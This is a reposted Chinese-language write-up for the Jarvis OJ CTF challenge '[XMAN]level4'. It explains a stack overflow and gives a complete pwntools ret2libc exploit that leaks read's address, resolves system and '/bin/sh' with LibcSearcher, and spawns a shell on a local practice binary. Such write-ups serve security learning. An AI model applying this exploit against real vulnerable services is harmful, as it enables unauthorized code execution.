當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[Jarvis OJ - PWN]——[XMAN]level4

發(fā)布時間：2024/4/17 编程问答 30 豆豆

生活随笔收集整理的這篇文章主要介紹了 [Jarvis OJ - PWN]——[XMAN]level4 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

[Jarvis OJ - PWN]——[XMAN]level4

題目地址: https://www.jarvisoj.com/challenges
題目:
checksec一下

IDA中

思路

0x100 - 0x88 = 120, 多余的空間足夠我們進(jìn)行棧溢出利用
但是我們沒有system和’/bin/sh’地址。也不知道libc版本, 我們可以先leek出來一個地址, 利用偏移找到system和’/bin/sh’地址。再返回main進(jìn)行循環(huán)調(diào)用,第二次就可以直接控制返回到system。

exploit

from pwn import * from LibcSearcher import * p = process("./level4") #gdb.attach(p, "b *0x0804846D") elf = ELF("./level4") write_plt = elf.plt['write'] read_got = elf.got['read'] main_addr = 0x08048470 payload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)p.sendline(payload) read_addr = u32(p.recv(4)) print hex(read_addr) libc = LibcSearcher("read", read_addr) libc_base = read_addr - libc.dump('read') sys_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh) p.sendline(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[XMAN]level4的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇： [Jarvis OJ - PWN]——S
下一篇： [Jarvis OJ - PWN]——T